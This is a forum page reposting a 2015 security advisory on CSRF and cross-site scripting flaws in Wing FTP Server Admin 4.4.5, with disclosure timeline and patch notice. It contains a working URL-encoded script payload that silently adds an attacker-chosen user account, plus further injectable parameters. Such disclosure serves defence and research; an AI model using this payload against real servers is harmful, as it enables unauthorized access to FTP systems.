Jump to content

Search the Community

Showing results for tags 'wing'.

  • Search By Tags

    Type tags separated by commas.

  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End

Last Updated

  • Start

    End

Filter by number of...

Joined

  • Start

    End

Group

Website URL

Yahoo

Jabber

Skype

Location

Interests

Biography

Location

Interests

Occupation

Found 1 result

  1. KhiZaRix
    Document Title: =============== Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities Release Date: ============= 2015-04-28 apparitionsec ID (AS-ID): ==================================== AS-WFTP0328 Common Vulnerability Scoring System: ==================================== Overall CVSS Score 8.9 Product: =============================== Wing FTP Server is a Web based administration FTP client that supports following protocols FTP, FTPS, HTTPS, SSH Advisory Information: ============================== Security researcher John Page discovered a CSRF & client-side cross site scripting web vulnerability within Wing FTP Server Admin that allows adding arbitrary users to the system. Vulnerability Disclosure Timeline: ================================== March 28, 2015: Vendor Notification March 28, 2015: Vendor Response/Feedback April 19, 2015: Vendor Notification April 28, 2015: Vendor released new patched version 4.4.6 April 28, 2015: Public Disclosure - John Page Affected Product(s): ==================== Wing FTP Server Admin 4.4.5 Product: Wing FTP Server - Admin Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ Request Method(s): [+] POST & GET Vulnerable Product: [+] Wing FTP Server Admin 4.4.5 Vulnerable Parameter(s): [+] domain & type Affected Area(s): [+] Server Admin Proof of Concept (POC): ======================= The CSRF and client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction (click). Payload will add arbitrary users to the system. POC: Example http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES] POC: Payload(s) Add arbitrary user to the system: http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E POC XSS: http://localhost:5466/admin_viewstatus.html?domain= POC XSS: http://localhost:5466/admin_event_list.html?type= Solution - Fix & Patch: ======================= Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server) Security Risk: ============== The security risk of the CSRF client-side cross site scripting web vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9 Credits & Authors: ================== John Page ( hyp3rlinx ) - ISR godz @Apparitionsec Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. the security research reporter John Page disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. apparitionsec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domains: hyp3rlinx.altervista.org Source: http://dl.packetstormsecurity.net/1504-exploits/AS-WFTP0328.txt
×
×
  • Create New...